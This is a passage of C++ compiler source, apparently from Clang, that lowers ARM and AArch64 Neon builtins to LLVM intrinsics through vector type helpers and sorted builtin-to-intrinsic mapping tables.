const CallExpr *E,
ReturnValueSlot ReturnValue) {
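// An "aux" builtin belongs to the auxiliary target, e.g. the host
// target during CUDA/HIP device compilation; dispatch it using the aux
// triple rather than the primary one.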
if (getContext().BuiltinInfo.isAuxBuiltinID(BuiltinID)) {
assert(getContext().getAuxTargetInfo() && "Missing aux target info");
return EmitTargetArchBuiltinExpr(
this, getContext().BuiltinInfo.getAuxBuiltinID(BuiltinID), E,
ReturnValue, getContext().getAuxTargetInfo()->getTriple().getArch());
}
return EmitTargetArchBuiltinExpr(this, BuiltinID, E, ReturnValue,
getTarget().getTriple().getArch());
}
static llvm::FixedVectorType *GetNeonType(CodeGenFunction *CGF,
NeonTypeFlags TypeFlags,
bool HasLegalHalfType = true,
bool V1Ty = false,
bool AllowBFloatArgsAndRet = true) {
int IsQuad = TypeFlags.isQuad();
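// A Neon vector register is 64 bits wide, or 128 bits for "quad"
// types; shifting the base lane count by IsQuad selects between them
// (V1Ty forces a single-element vector for scalar intrinsics).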
switch (TypeFlags.getEltType()) {
case NeonTypeFlags::Int8:
case NeonTypeFlags::Poly8:
return llvm::FixedVectorType::get(CGF->Int8Ty, V1Ty ? 1 : (8 << IsQuad));
case NeonTypeFlags::Int16:
case NeonTypeFlags::Poly16:
return llvm::FixedVectorType::get(CGF->Int16Ty, V1Ty ? 1 : (4 << IsQuad));
case NeonTypeFlags::BFloat16:
if (AllowBFloatArgsAndRet)
return llvm::FixedVectorType::get(CGF->BFloatTy, V1Ty ? 1 : (4 << IsQuad));
else
return llvm::FixedVectorType::get(CGF->Int16Ty, V1Ty ? 1 : (4 << IsQuad));
case NeonTypeFlags::Float16:
if (HasLegalHalfType)
return llvm::FixedVectorType::get(CGF->HalfTy, V1Ty ? 1 : (4 << IsQuad));
else
return llvm::FixedVectorType::get(CGF->Int16Ty, V1Ty ? 1 : (4 << IsQuad));
case NeonTypeFlags::Int32:
return llvm::FixedVectorType::get(CGF->Int32Ty, V1Ty ? 1 : (2 << IsQuad));
case NeonTypeFlags::Int64:
case NeonTypeFlags::Poly64:
return llvm::FixedVectorType::get(CGF->Int64Ty, V1Ty ? 1 : (1 << IsQuad));
case NeonTypeFlags::Poly128:
// FIXME: i128 and f128 are not fully supported in Clang and LLVM;
// much of the i128 and f128 API is missing, so we use v16i8 to
// represent poly128 and rely on pattern matching.
return llvm::FixedVectorType::get(CGF->Int8Ty, 16);
case NeonTypeFlags::Float32:
return llvm::FixedVectorType::get(CGF->FloatTy, V1Ty ? 1 : (2 << IsQuad));
case NeonTypeFlags::Float64:
return llvm::FixedVectorType::get(CGF->DoubleTy, V1Ty ? 1 : (1 << IsQuad));
}
llvm_unreachable("Unknown vector element type!");
}
static llvm::VectorType *GetFloatNeonType(CodeGenFunction *CGF,
NeonTypeFlags IntTypeFlags) {
int IsQuad = IntTypeFlags.isQuad();
switch (IntTypeFlags.getEltType()) {
case NeonTypeFlags::Int16:
return llvm::FixedVectorType::get(CGF->HalfTy, (4 << IsQuad));
case NeonTypeFlags::Int32:
return llvm::FixedVectorType::get(CGF->FloatTy, (2 << IsQuad));
case NeonTypeFlags::Int64:
return llvm::FixedVectorType::get(CGF->DoubleTy, (1 << IsQuad));
default:
llvm_unreachable("Type can't be converted to floating-point!");
}
}
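// Splat lane C of V across Count lanes using a constant shuffle mask.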
Value *CodeGenFunction::EmitNeonSplat(Value *V, Constant *C,
const ElementCount &Count) {
Value *SV = llvm::ConstantVector::getSplat(Count, C);
return Builder.CreateShuffleVector(V, V, SV, "lane");
}
Value *CodeGenFunction::EmitNeonSplat(Value *V, Constant *C) {
ElementCount EC = cast<llvm::VectorType>(V->getType())->getElementCount();
return EmitNeonSplat(V, C, EC);
}
Value *CodeGenFunction::EmitNeonCall(Function *F, SmallVectorImpl<Value*> &Ops,
const char *name,
unsigned shift, bool rightshift) {
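// Bitcast each operand to the parameter type the intrinsic expects,
// treating the designated shift operand specially; constrained FP
// intrinsics carry trailing metadata operands, which are skipped.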
unsigned j = 0;
for (Function::const_arg_iterator ai = F->arg_begin(), ae = F->arg_end();
ai != ae; ++ai, ++j) {
if (F->isConstrainedFPIntrinsic())
if (ai->getType()->isMetadataTy())
continue;
if (shift > 0 && shift == j)
Ops[j] = EmitNeonShiftVector(Ops[j], ai->getType(), rightshift);
else
Ops[j] = Builder.CreateBitCast(Ops[j], ai->getType(), name);
}
if (F->isConstrainedFPIntrinsic())
return Builder.CreateConstrainedFPCall(F, Ops, name);
else
return Builder.CreateCall(F, Ops, name);
}
Value *CodeGenFunction::EmitNeonShiftVector(Value *V, llvm::Type *Ty,
bool neg) {
int SV = cast<ConstantInt>(V)->getSExtValue();
return ConstantInt::get(Ty, neg ? -SV : SV);
}
// Right-shift a vector by a constant.
Value *CodeGenFunction::EmitNeonRShiftImm(Value *Vec, Value *Shift,
llvm::Type *Ty, bool usgn,
const char *name) {
llvm::VectorType *VTy = cast<llvm::VectorType>(Ty);
int ShiftAmt = cast<ConstantInt>(Shift)->getSExtValue();
int EltSize = VTy->getScalarSizeInBits();
Vec = Builder.CreateBitCast(Vec, Ty);
// lshr/ashr are undefined when the shift amount is equal to the vector
// element size.
if (ShiftAmt == EltSize) {
if (usgn) {
// Right-shifting an unsigned value by its size yields 0.
return llvm::ConstantAggregateZero::get(VTy);
} else {
// Right-shifting a signed value by its size is equivalent
// to a shift of size-1.
--ShiftAmt;
Shift = ConstantInt::get(VTy->getElementType(), ShiftAmt);
}
}
Shift = EmitNeonShiftVector(Shift, Ty, false);
if (usgn)
return Builder.CreateLShr(Vec, Shift, name);
else
return Builder.CreateAShr(Vec, Shift, name);
}
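// Bitmask flags describing how an intrinsic's LLVM signature is derived
// from the builtin's operand and return types; combined into the
// TypeModifier field of the intrinsic tables below.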
enum {
AddRetType = (1 << 0),
Add1ArgType = (1 << 1),
Add2ArgTypes = (1 << 2),
VectorizeRetType = (1 << 3),
VectorizeArgTypes = (1 << 4),
InventFloatType = (1 << 5),
UnsignedAlts = (1 << 6),
Use64BitVectors = (1 << 7),
Use128BitVectors = (1 << 8),
Vectorize1ArgType = Add1ArgType | VectorizeArgTypes,
VectorRet = AddRetType | VectorizeRetType,
VectorRetGetArgs01 =
AddRetType | Add2ArgTypes | VectorizeRetType | VectorizeArgTypes,
FpCmpzModifiers =
AddRetType | VectorizeRetType | Add1ArgType | InventFloatType
};
namespace {
struct ARMVectorIntrinsicInfo {
const char *NameHint;
unsigned BuiltinID;
unsigned LLVMIntrinsic;
unsigned AltLLVMIntrinsic;
uint64_t TypeModifier;
bool operator<(unsigned RHSBuiltinID) const {
return BuiltinID < RHSBuiltinID;
}
bool operator<(const ARMVectorIntrinsicInfo &TE) const {
return BuiltinID < TE.BuiltinID;
}
};
} // end anonymous namespace
#define NEONMAP0(NameBase) \
{ #NameBase, NEON::BI__builtin_neon_ ## NameBase, 0, 0, 0 }
#define NEONMAP1(NameBase, LLVMIntrinsic, TypeModifier) \
{ #NameBase, NEON:: BI__builtin_neon_ ## NameBase, \
Intrinsic::LLVMIntrinsic, 0, TypeModifier }
#define NEONMAP2(NameBase, LLVMIntrinsic, AltLLVMIntrinsic, TypeModifier) \
{ #NameBase, NEON:: BI__builtin_neon_ ## NameBase, \
Intrinsic::LLVMIntrinsic, Intrinsic::AltLLVMIntrinsic, \
TypeModifier }
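// Each entry maps one Neon builtin to up to two LLVM intrinsics (the
// Alt intrinsic handles the unsigned variant when UnsignedAlts is set)
// plus type-modifier flags. The table must remain sorted by BuiltinID,
// as it is consumed by binary search.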
static const ARMVectorIntrinsicInfo ARMSIMDIntrinsicMap[] = {
NEONMAP1(__a32_vcvt_bf16_v, arm_neon_vcvtfp2bf, 0),
NEONMAP0(splat_lane_v),
NEONMAP0(splat_laneq_v),
NEONMAP0(splatq_lane_v),
NEONMAP0(splatq_laneq_v),
NEONMAP2(vabd_v, arm_neon_vabdu, arm_neon_vabds, Add1ArgType | UnsignedAlts),
NEONMAP2(vabdq_v, arm_neon_vabdu, arm_neon_vabds, Add1ArgType | UnsignedAlts),
NEONMAP1(vabs_v, arm_neon_vabs, 0),
NEONMAP1(vabsq_v, arm_neon_vabs, 0),
NEONMAP0(vadd_v),
NEONMAP0(vaddhn_v),
NEONMAP0(vaddq_v),
NEONMAP1(vaesdq_v, arm_neon_aesd, 0),
NEONMAP1(vaeseq_v, arm_neon_aese, 0),
NEONMAP1(vaesimcq_v, arm_neon_aesimc, 0),
NEONMAP1(vaesmcq_v, arm_neon_aesmc, 0),
NEONMAP1(vbfdot_v, arm_neon_bfdot, 0),
NEONMAP1(vbfdotq_v, arm_neon_bfdot, 0),
NEONMAP1(vbfmlalbq_v, arm_neon_bfmlalb, 0),
NEONMAP1(vbfmlaltq_v, arm_neon_bfmlalt, 0),
NEONMAP1(vbfmmlaq_v, arm_neon_bfmmla, 0),
NEONMAP1(vbsl_v, arm_neon_vbsl, AddRetType),
NEONMAP1(vbslq_v, arm_neon_vbsl, AddRetType),
NEONMAP1(vcadd_rot270_v, arm_neon_vcadd_rot270, Add1ArgType),
NEONMAP1(vcadd_rot90_v, arm_neon_vcadd_rot90, Add1ArgType),
NEONMAP1(vcaddq_rot270_v, arm_neon_vcadd_rot270, Add1ArgType),
NEONMAP1(vcaddq_rot90_v, arm_neon_vcadd_rot90, Add1ArgType),
NEONMAP1(vcage_v, arm_neon_vacge, 0),
NEONMAP1(vcageq_v, arm_neon_vacge, 0),
NEONMAP1(vcagt_v, arm_neon_vacgt, 0),
NEONMAP1(vcagtq_v, arm_neon_vacgt, 0),
NEONMAP1(vcale_v, arm_neon_vacge, 0),
NEONMAP1(vcaleq_v, arm_neon_vacge, 0),
NEONMAP1(vcalt_v, arm_neon_vacgt, 0),
NEONMAP1(vcaltq_v, arm_neon_vacgt, 0),
NEONMAP0(vceqz_v),
NEONMAP0(vceqzq_v),
NEONMAP0(vcgez_v),
NEONMAP0(vcgezq_v),
NEONMAP0(vcgtz_v),
NEONMAP0(vcgtzq_v),
NEONMAP0(vclez_v),
NEONMAP0(vclezq_v),
NEONMAP1(vcls_v, arm_neon_vcls, Add1ArgType),
NEONMAP1(vclsq_v, arm_neon_vcls, Add1ArgType),
NEONMAP0(vcltz_v),
NEONMAP0(vcltzq_v),
NEONMAP1(vclz_v, ctlz, Add1ArgType),
NEONMAP1(vclzq_v, ctlz, Add1ArgType),
NEONMAP1(vcnt_v, ctpop, Add1ArgType),
NEONMAP1(vcntq_v, ctpop, Add1ArgType),
NEONMAP1(vcvt_f16_f32, arm_neon_vcvtfp2hf, 0),
NEONMAP0(vcvt_f16_v),
NEONMAP1(vcvt_f32_f16, arm_neon_vcvthf2fp, 0),
NEONMAP0(vcvt_f32_v),
NEONMAP2(vcvt_n_f16_v, arm_neon_vcvtfxu2fp, arm_neon_vcvtfxs2fp, 0),
NEONMAP2(vcvt_n_f32_v, arm_neon_vcvtfxu2fp, arm_neon_vcvtfxs2fp, 0),
NEONMAP1(vcvt_n_s16_v, arm_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvt_n_s32_v, arm_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvt_n_s64_v, arm_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvt_n_u16_v, arm_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvt_n_u32_v, arm_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvt_n_u64_v, arm_neon_vcvtfp2fxu, 0),
NEONMAP0(vcvt_s16_v),
NEONMAP0(vcvt_s32_v),
NEONMAP0(vcvt_s64_v),
NEONMAP0(vcvt_u16_v),
NEONMAP0(vcvt_u32_v),
NEONMAP0(vcvt_u64_v),
NEONMAP1(vcvta_s16_v, arm_neon_vcvtas, 0),
NEONMAP1(vcvta_s32_v, arm_neon_vcvtas, 0),
NEONMAP1(vcvta_s64_v, arm_neon_vcvtas, 0),
NEONMAP1(vcvta_u16_v, arm_neon_vcvtau, 0),
NEONMAP1(vcvta_u32_v, arm_neon_vcvtau, 0),
NEONMAP1(vcvta_u64_v, arm_neon_vcvtau, 0),
NEONMAP1(vcvtaq_s16_v, arm_neon_vcvtas, 0),
NEONMAP1(vcvtaq_s32_v, arm_neon_vcvtas, 0),
NEONMAP1(vcvtaq_s64_v, arm_neon_vcvtas, 0),
NEONMAP1(vcvtaq_u16_v, arm_neon_vcvtau, 0),
NEONMAP1(vcvtaq_u32_v, arm_neon_vcvtau, 0),
NEONMAP1(vcvtaq_u64_v, arm_neon_vcvtau, 0),
NEONMAP1(vcvth_bf16_f32, arm_neon_vcvtbfp2bf, 0),
NEONMAP1(vcvtm_s16_v, arm_neon_vcvtms, 0),
NEONMAP1(vcvtm_s32_v, arm_neon_vcvtms, 0),
NEONMAP1(vcvtm_s64_v, arm_neon_vcvtms, 0),
NEONMAP1(vcvtm_u16_v, arm_neon_vcvtmu, 0),
NEONMAP1(vcvtm_u32_v, arm_neon_vcvtmu, 0),
NEONMAP1(vcvtm_u64_v, arm_neon_vcvtmu, 0),
NEONMAP1(vcvtmq_s16_v, arm_neon_vcvtms, 0),
NEONMAP1(vcvtmq_s32_v, arm_neon_vcvtms, 0),
NEONMAP1(vcvtmq_s64_v, arm_neon_vcvtms, 0),
NEONMAP1(vcvtmq_u16_v, arm_neon_vcvtmu, 0),
NEONMAP1(vcvtmq_u32_v, arm_neon_vcvtmu, 0),
NEONMAP1(vcvtmq_u64_v, arm_neon_vcvtmu, 0),
NEONMAP1(vcvtn_s16_v, arm_neon_vcvtns, 0),
NEONMAP1(vcvtn_s32_v, arm_neon_vcvtns, 0),
NEONMAP1(vcvtn_s64_v, arm_neon_vcvtns, 0),
NEONMAP1(vcvtn_u16_v, arm_neon_vcvtnu, 0),
NEONMAP1(vcvtn_u32_v, arm_neon_vcvtnu, 0),
NEONMAP1(vcvtn_u64_v, arm_neon_vcvtnu, 0),
NEONMAP1(vcvtnq_s16_v, arm_neon_vcvtns, 0),
NEONMAP1(vcvtnq_s32_v, arm_neon_vcvtns, 0),
NEONMAP1(vcvtnq_s64_v, arm_neon_vcvtns, 0),
NEONMAP1(vcvtnq_u16_v, arm_neon_vcvtnu, 0),
NEONMAP1(vcvtnq_u32_v, arm_neon_vcvtnu, 0),
NEONMAP1(vcvtnq_u64_v, arm_neon_vcvtnu, 0),
NEONMAP1(vcvtp_s16_v, arm_neon_vcvtps, 0),
NEONMAP1(vcvtp_s32_v, arm_neon_vcvtps, 0),
NEONMAP1(vcvtp_s64_v, arm_neon_vcvtps, 0),
NEONMAP1(vcvtp_u16_v, arm_neon_vcvtpu, 0),
NEONMAP1(vcvtp_u32_v, arm_neon_vcvtpu, 0),
NEONMAP1(vcvtp_u64_v, arm_neon_vcvtpu, 0),
NEONMAP1(vcvtpq_s16_v, arm_neon_vcvtps, 0),
NEONMAP1(vcvtpq_s32_v, arm_neon_vcvtps, 0),
NEONMAP1(vcvtpq_s64_v, arm_neon_vcvtps, 0),
NEONMAP1(vcvtpq_u16_v, arm_neon_vcvtpu, 0),
NEONMAP1(vcvtpq_u32_v, arm_neon_vcvtpu, 0),
NEONMAP1(vcvtpq_u64_v, arm_neon_vcvtpu, 0),
NEONMAP0(vcvtq_f16_v),
NEONMAP0(vcvtq_f32_v),
NEONMAP2(vcvtq_n_f16_v, arm_neon_vcvtfxu2fp, arm_neon_vcvtfxs2fp, 0),
NEONMAP2(vcvtq_n_f32_v, arm_neon_vcvtfxu2fp, arm_neon_vcvtfxs2fp, 0),
NEONMAP1(vcvtq_n_s16_v, arm_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvtq_n_s32_v, arm_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvtq_n_s64_v, arm_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvtq_n_u16_v, arm_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvtq_n_u32_v, arm_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvtq_n_u64_v, arm_neon_vcvtfp2fxu, 0),
NEONMAP0(vcvtq_s16_v),
NEONMAP0(vcvtq_s32_v),
NEONMAP0(vcvtq_s64_v),
NEONMAP0(vcvtq_u16_v),
NEONMAP0(vcvtq_u32_v),
NEONMAP0(vcvtq_u64_v),
NEONMAP2(vdot_v, arm_neon_udot, arm_neon_sdot, 0),
NEONMAP2(vdotq_v, arm_neon_udot, arm_neon_sdot, 0),
NEONMAP0(vext_v),
NEONMAP0(vextq_v),
NEONMAP0(vfma_v),
NEONMAP0(vfmaq_v),
NEONMAP2(vhadd_v, arm_neon_vhaddu, arm_neon_vhadds, Add1ArgType | UnsignedAlts),
NEONMAP2(vhaddq_v, arm_neon_vhaddu, arm_neon_vhadds, Add1ArgType | UnsignedAlts),
NEONMAP2(vhsub_v, arm_neon_vhsubu, arm_neon_vhsubs, Add1ArgType | UnsignedAlts),
NEONMAP2(vhsubq_v, arm_neon_vhsubu, arm_neon_vhsubs, Add1ArgType | UnsignedAlts),
NEONMAP0(vld1_dup_v),
NEONMAP1(vld1_v, arm_neon_vld1, 0),
NEONMAP1(vld1_x2_v, arm_neon_vld1x2, 0),
NEONMAP1(vld1_x3_v, arm_neon_vld1x3, 0),
NEONMAP1(vld1_x4_v, arm_neon_vld1x4, 0),
NEONMAP0(vld1q_dup_v),
NEONMAP1(vld1q_v, arm_neon_vld1, 0),
NEONMAP1(vld1q_x2_v, arm_neon_vld1x2, 0),
NEONMAP1(vld1q_x3_v, arm_neon_vld1x3, 0),
NEONMAP1(vld1q_x4_v, arm_neon_vld1x4, 0),
NEONMAP1(vld2_dup_v, arm_neon_vld2dup, 0),
NEONMAP1(vld2_lane_v, arm_neon_vld2lane, 0),
NEONMAP1(vld2_v, arm_neon_vld2, 0),
NEONMAP1(vld2q_dup_v, arm_neon_vld2dup, 0),
NEONMAP1(vld2q_lane_v, arm_neon_vld2lane, 0),
NEONMAP1(vld2q_v, arm_neon_vld2, 0),
NEONMAP1(vld3_dup_v, arm_neon_vld3dup, 0),
NEONMAP1(vld3_lane_v, arm_neon_vld3lane, 0),
NEONMAP1(vld3_v, arm_neon_vld3, 0),
NEONMAP1(vld3q_dup_v, arm_neon_vld3dup, 0),
NEONMAP1(vld3q_lane_v, arm_neon_vld3lane, 0),
NEONMAP1(vld3q_v, arm_neon_vld3, 0),
NEONMAP1(vld4_dup_v, arm_neon_vld4dup, 0),
NEONMAP1(vld4_lane_v, arm_neon_vld4lane, 0),
NEONMAP1(vld4_v, arm_neon_vld4, 0),
NEONMAP1(vld4q_dup_v, arm_neon_vld4dup, 0),
NEONMAP1(vld4q_lane_v, arm_neon_vld4lane, 0),
NEONMAP1(vld4q_v, arm_neon_vld4, 0),
NEONMAP2(vmax_v, arm_neon_vmaxu, arm_neon_vmaxs, Add1ArgType | UnsignedAlts),
NEONMAP1(vmaxnm_v, arm_neon_vmaxnm, Add1ArgType),
NEONMAP1(vmaxnmq_v, arm_neon_vmaxnm, Add1ArgType),
NEONMAP2(vmaxq_v, arm_neon_vmaxu, arm_neon_vmaxs, Add1ArgType | UnsignedAlts),
NEONMAP2(vmin_v, arm_neon_vminu, arm_neon_vmins, Add1ArgType | UnsignedAlts),
NEONMAP1(vminnm_v, arm_neon_vminnm, Add1ArgType),
NEONMAP1(vminnmq_v, arm_neon_vminnm, Add1ArgType),
NEONMAP2(vminq_v, arm_neon_vminu, arm_neon_vmins, Add1ArgType | UnsignedAlts),
NEONMAP2(vmmlaq_v, arm_neon_ummla, arm_neon_smmla, 0),
NEONMAP0(vmovl_v),
NEONMAP0(vmovn_v),
NEONMAP1(vmul_v, arm_neon_vmulp, Add1ArgType),
NEONMAP0(vmull_v),
NEONMAP1(vmulq_v, arm_neon_vmulp, Add1ArgType),
NEONMAP2(vpadal_v, arm_neon_vpadalu, arm_neon_vpadals, UnsignedAlts),
NEONMAP2(vpadalq_v, arm_neon_vpadalu, arm_neon_vpadals, UnsignedAlts),
NEONMAP1(vpadd_v, arm_neon_vpadd, Add1ArgType),
NEONMAP2(vpaddl_v, arm_neon_vpaddlu, arm_neon_vpaddls, UnsignedAlts),
NEONMAP2(vpaddlq_v, arm_neon_vpaddlu, arm_neon_vpaddls, UnsignedAlts),
NEONMAP1(vpaddq_v, arm_neon_vpadd, Add1ArgType),
NEONMAP2(vpmax_v, arm_neon_vpmaxu, arm_neon_vpmaxs, Add1ArgType | UnsignedAlts),
NEONMAP2(vpmin_v, arm_neon_vpminu, arm_neon_vpmins, Add1ArgType | UnsignedAlts),
NEONMAP1(vqabs_v, arm_neon_vqabs, Add1ArgType),
NEONMAP1(vqabsq_v, arm_neon_vqabs, Add1ArgType),
NEONMAP2(vqadd_v, uadd_sat, sadd_sat, Add1ArgType | UnsignedAlts),
NEONMAP2(vqaddq_v, uadd_sat, sadd_sat, Add1ArgType | UnsignedAlts),
NEONMAP2(vqdmlal_v, arm_neon_vqdmull, sadd_sat, 0),
NEONMAP2(vqdmlsl_v, arm_neon_vqdmull, ssub_sat, 0),
NEONMAP1(vqdmulh_v, arm_neon_vqdmulh, Add1ArgType),
NEONMAP1(vqdmulhq_v, arm_neon_vqdmulh, Add1ArgType),
NEONMAP1(vqdmull_v, arm_neon_vqdmull, Add1ArgType),
NEONMAP2(vqmovn_v, arm_neon_vqmovnu, arm_neon_vqmovns, Add1ArgType | UnsignedAlts),
NEONMAP1(vqmovun_v, arm_neon_vqmovnsu, Add1ArgType),
NEONMAP1(vqneg_v, arm_neon_vqneg, Add1ArgType),
NEONMAP1(vqnegq_v, arm_neon_vqneg, Add1ArgType),
NEONMAP1(vqrdmulh_v, arm_neon_vqrdmulh, Add1ArgType),
NEONMAP1(vqrdmulhq_v, arm_neon_vqrdmulh, Add1ArgType),
NEONMAP2(vqrshl_v, arm_neon_vqrshiftu, arm_neon_vqrshifts, Add1ArgType | UnsignedAlts),
NEONMAP2(vqrshlq_v, arm_neon_vqrshiftu, arm_neon_vqrshifts, Add1ArgType | UnsignedAlts),
NEONMAP2(vqshl_n_v, arm_neon_vqshiftu, arm_neon_vqshifts, UnsignedAlts),
NEONMAP2(vqshl_v, arm_neon_vqshiftu, arm_neon_vqshifts, Add1ArgType | UnsignedAlts),
NEONMAP2(vqshlq_n_v, arm_neon_vqshiftu, arm_neon_vqshifts, UnsignedAlts),
NEONMAP2(vqshlq_v, arm_neon_vqshiftu, arm_neon_vqshifts, Add1ArgType | UnsignedAlts),
NEONMAP1(vqshlu_n_v, arm_neon_vqshiftsu, 0),
NEONMAP1(vqshluq_n_v, arm_neon_vqshiftsu, 0),
NEONMAP2(vqsub_v, usub_sat, ssub_sat, Add1ArgType | UnsignedAlts),
NEONMAP2(vqsubq_v, usub_sat, ssub_sat, Add1ArgType | UnsignedAlts),
NEONMAP1(vraddhn_v, arm_neon_vraddhn, Add1ArgType),
NEONMAP2(vrecpe_v, arm_neon_vrecpe, arm_neon_vrecpe, 0),
NEONMAP2(vrecpeq_v, arm_neon_vrecpe, arm_neon_vrecpe, 0),
NEONMAP1(vrecps_v, arm_neon_vrecps, Add1ArgType),
NEONMAP1(vrecpsq_v, arm_neon_vrecps, Add1ArgType),
NEONMAP2(vrhadd_v, arm_neon_vrhaddu, arm_neon_vrhadds, Add1ArgType | UnsignedAlts),
NEONMAP2(vrhaddq_v, arm_neon_vrhaddu, arm_neon_vrhadds, Add1ArgType | UnsignedAlts),
NEONMAP1(vrnd_v, arm_neon_vrintz, Add1ArgType),
NEONMAP1(vrnda_v, arm_neon_vrinta, Add1ArgType),
NEONMAP1(vrndaq_v, arm_neon_vrinta, Add1ArgType),
NEONMAP0(vrndi_v),
NEONMAP0(vrndiq_v),
NEONMAP1(vrndm_v, arm_neon_vrintm, Add1ArgType),
NEONMAP1(vrndmq_v, arm_neon_vrintm, Add1ArgType),
NEONMAP1(vrndn_v, arm_neon_vrintn, Add1ArgType),
NEONMAP1(vrndnq_v, arm_neon_vrintn, Add1ArgType),
NEONMAP1(vrndp_v, arm_neon_vrintp, Add1ArgType),
NEONMAP1(vrndpq_v, arm_neon_vrintp, Add1ArgType),
NEONMAP1(vrndq_v, arm_neon_vrintz, Add1ArgType),
NEONMAP1(vrndx_v, arm_neon_vrintx, Add1ArgType),
NEONMAP1(vrndxq_v, arm_neon_vrintx, Add1ArgType),
NEONMAP2(vrshl_v, arm_neon_vrshiftu, arm_neon_vrshifts, Add1ArgType | UnsignedAlts),
NEONMAP2(vrshlq_v, arm_neon_vrshiftu, arm_neon_vrshifts, Add1ArgType | UnsignedAlts),
NEONMAP2(vrshr_n_v, arm_neon_vrshiftu, arm_neon_vrshifts, UnsignedAlts),
NEONMAP2(vrshrq_n_v, arm_neon_vrshiftu, arm_neon_vrshifts, UnsignedAlts),
NEONMAP2(vrsqrte_v, arm_neon_vrsqrte, arm_neon_vrsqrte, 0),
NEONMAP2(vrsqrteq_v, arm_neon_vrsqrte, arm_neon_vrsqrte, 0),
NEONMAP1(vrsqrts_v, arm_neon_vrsqrts, Add1ArgType),
NEONMAP1(vrsqrtsq_v, arm_neon_vrsqrts, Add1ArgType),
NEONMAP1(vrsubhn_v, arm_neon_vrsubhn, Add1ArgType),
NEONMAP1(vsha1su0q_v, arm_neon_sha1su0, 0),
NEONMAP1(vsha1su1q_v, arm_neon_sha1su1, 0),
NEONMAP1(vsha256h2q_v, arm_neon_sha256h2, 0),
NEONMAP1(vsha256hq_v, arm_neon_sha256h, 0),
NEONMAP1(vsha256su0q_v, arm_neon_sha256su0, 0),
NEONMAP1(vsha256su1q_v, arm_neon_sha256su1, 0),
NEONMAP0(vshl_n_v),
NEONMAP2(vshl_v, arm_neon_vshiftu, arm_neon_vshifts, Add1ArgType | UnsignedAlts),
NEONMAP0(vshll_n_v),
NEONMAP0(vshlq_n_v),
NEONMAP2(vshlq_v, arm_neon_vshiftu, arm_neon_vshifts, Add1ArgType | UnsignedAlts),
NEONMAP0(vshr_n_v),
NEONMAP0(vshrn_n_v),
NEONMAP0(vshrq_n_v),
NEONMAP1(vst1_v, arm_neon_vst1, 0),
NEONMAP1(vst1_x2_v, arm_neon_vst1x2, 0),
NEONMAP1(vst1_x3_v, arm_neon_vst1x3, 0),
NEONMAP1(vst1_x4_v, arm_neon_vst1x4, 0),
NEONMAP1(vst1q_v, arm_neon_vst1, 0),
NEONMAP1(vst1q_x2_v, arm_neon_vst1x2, 0),
NEONMAP1(vst1q_x3_v, arm_neon_vst1x3, 0),
NEONMAP1(vst1q_x4_v, arm_neon_vst1x4, 0),
NEONMAP1(vst2_lane_v, arm_neon_vst2lane, 0),
NEONMAP1(vst2_v, arm_neon_vst2, 0),
NEONMAP1(vst2q_lane_v, arm_neon_vst2lane, 0),
NEONMAP1(vst2q_v, arm_neon_vst2, 0),
NEONMAP1(vst3_lane_v, arm_neon_vst3lane, 0),
NEONMAP1(vst3_v, arm_neon_vst3, 0),
NEONMAP1(vst3q_lane_v, arm_neon_vst3lane, 0),
NEONMAP1(vst3q_v, arm_neon_vst3, 0),
NEONMAP1(vst4_lane_v, arm_neon_vst4lane, 0),
NEONMAP1(vst4_v, arm_neon_vst4, 0),
NEONMAP1(vst4q_lane_v, arm_neon_vst4lane, 0),
NEONMAP1(vst4q_v, arm_neon_vst4, 0),
NEONMAP0(vsubhn_v),
NEONMAP0(vtrn_v),
NEONMAP0(vtrnq_v),
NEONMAP0(vtst_v),
NEONMAP0(vtstq_v),
NEONMAP1(vusdot_v, arm_neon_usdot, 0),
NEONMAP1(vusdotq_v, arm_neon_usdot, 0),
NEONMAP1(vusmmlaq_v, arm_neon_usmmla, 0),
NEONMAP0(vuzp_v),
NEONMAP0(vuzpq_v),
NEONMAP0(vzip_v),
NEONMAP0(vzipq_v)
};
static const ARMVectorIntrinsicInfo AArch64SIMDIntrinsicMap[] = {
NEONMAP1(__a64_vcvtq_low_bf16_v, aarch64_neon_bfcvtn, 0),
NEONMAP0(splat_lane_v),
NEONMAP0(splat_laneq_v),
NEONMAP0(splatq_lane_v),
NEONMAP0(splatq_laneq_v),
NEONMAP1(vabs_v, aarch64_neon_abs, 0),
NEONMAP1(vabsq_v, aarch64_neon_abs, 0),
NEONMAP0(vadd_v),
NEONMAP0(vaddhn_v),
NEONMAP0(vaddq_p128),
NEONMAP0(vaddq_v),
NEONMAP1(vaesdq_v, aarch64_crypto_aesd, 0),
NEONMAP1(vaeseq_v, aarch64_crypto_aese, 0),
NEONMAP1(vaesimcq_v, aarch64_crypto_aesimc, 0),
NEONMAP1(vaesmcq_v, aarch64_crypto_aesmc, 0),
NEONMAP2(vbcaxq_v, aarch64_crypto_bcaxu, aarch64_crypto_bcaxs, Add1ArgType | UnsignedAlts),
NEONMAP1(vbfdot_v, aarch64_neon_bfdot, 0),
NEONMAP1(vbfdotq_v, aarch64_neon_bfdot, 0),
NEONMAP1(vbfmlalbq_v, aarch64_neon_bfmlalb, 0),
NEONMAP1(vbfmlaltq_v, aarch64_neon_bfmlalt, 0),
NEONMAP1(vbfmmlaq_v, aarch64_neon_bfmmla, 0),
NEONMAP1(vcadd_rot270_v, aarch64_neon_vcadd_rot270, Add1ArgType),
NEONMAP1(vcadd_rot90_v, aarch64_neon_vcadd_rot90, Add1ArgType),
NEONMAP1(vcaddq_rot270_v, aarch64_neon_vcadd_rot270, Add1ArgType),
NEONMAP1(vcaddq_rot90_v, aarch64_neon_vcadd_rot90, Add1ArgType),
NEONMAP1(vcage_v, aarch64_neon_facge, 0),
NEONMAP1(vcageq_v, aarch64_neon_facge, 0),
NEONMAP1(vcagt_v, aarch64_neon_facgt, 0),
NEONMAP1(vcagtq_v, aarch64_neon_facgt, 0),
NEONMAP1(vcale_v, aarch64_neon_facge, 0),
NEONMAP1(vcaleq_v, aarch64_neon_facge, 0),
NEONMAP1(vcalt_v, aarch64_neon_facgt, 0),
NEONMAP1(vcaltq_v, aarch64_neon_facgt, 0),
